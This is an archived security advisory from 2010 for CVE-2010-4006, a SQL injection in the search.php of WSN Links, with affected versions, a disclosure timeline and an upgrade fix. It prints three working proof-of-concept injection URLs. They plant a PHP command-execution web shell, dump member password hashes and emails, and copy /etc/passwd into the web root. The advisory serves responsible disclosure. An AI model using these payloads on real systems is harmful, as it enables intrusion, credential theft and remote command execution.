WSN Links SQL Injection

🗓️ 02 Nov 2010 00:00:00Reported by Mark StanislavType

packetstorm🔗 packetstormsecurity.com👁 41 Views

'WSN Links' SQL Injection Vulnerability (CVE-2010-4006) allows 'UNION SELECT' SQL injection via search.php, affecting versions < 6.0.1, < 5.1.51, < 5.0.81. PoC exploits include PHP shell execution, extracting user data, and copying files. Upgrade to latest version for fix

Reporter	Title	Published	Views	Family All 12
0day.today	WSN Links SQL Injection Vulnerability	25 Nov 201000:00	–	zdt
CVE	CVE-2010-4006	3 Nov 201019:00	–	cve
Cvelist	CVE-2010-4006	3 Nov 201019:00	–	cvelist
Exploit DB	WSN Links - SQL Injection	24 Nov 201000:00	–	exploitdb
EUVD	EUVD-2010-3982	7 Oct 202500:30	–	euvd
exploitpack	WSN Links - SQL Injection	24 Nov 201000:00	–	exploitpack
myhack58	WSN Links SQL injection vulnerability-vulnerability warning-the black bar safety net	26 Nov 201000:00	–	myhack58
NVD	CVE-2010-4006	3 Nov 201020:00	–	nvd
Prion	Sql injection	3 Nov 201020:00	–	prion
securityvulns	'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)	2 Nov 201000:00	–	securityvulns

`'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)  
Mark Stanislav - [email protected]  
  
  
I. DESCRIPTION  
---------------------------------------  
A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur.   
  
  
II. AFFECTED VERSIONS  
---------------------------------------  
< 6.0.1; < 5.1.51 ; < 5.0.81  
  
  
III. TESTED VERSIONS  
---------------------------------------  
5.1.40 & 5.1.49  
  
  
IV. PoC EXPLOITS   
---------------------------------------  
1) A 'UNION SELECT' which results in a PHP shell-execution script  
http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories  
  
2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file  
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories  
  
3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file  
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories  
  
  
V. NOTES   
---------------------------------------  
* The above exploits require 'FILE' SQL privilege as well as poor web directory permissions to work.   
* Only 'namecondition' and 'namesearch' are utilized for the actual SQL injection.  
* There is potential to exploit this vulnerability which outputs user data directly to the browser.  
* Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN Links' deployments.  
  
  
VI. SOLUTION  
---------------------------------------  
Upgrade to the most recent version of your 'WSN Links' code branch.  
  
  
VII. REFERENCES  
---------------------------------------  
http://www.wsnlinks.com/  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006  
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/  
  
VIII. TIMELINE  
---------------------------------------  
10/10/2010: Initial discloure e-mail to the vendor  
10/18/2010: Follow-up via the vendor's contact web form  
10/18/2010: Vendor acknowledgement/commitment to fix  
10/21/2010: Patched versions released  
10/31/2010: Public disclosure  
`

02 Nov 2010 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.01376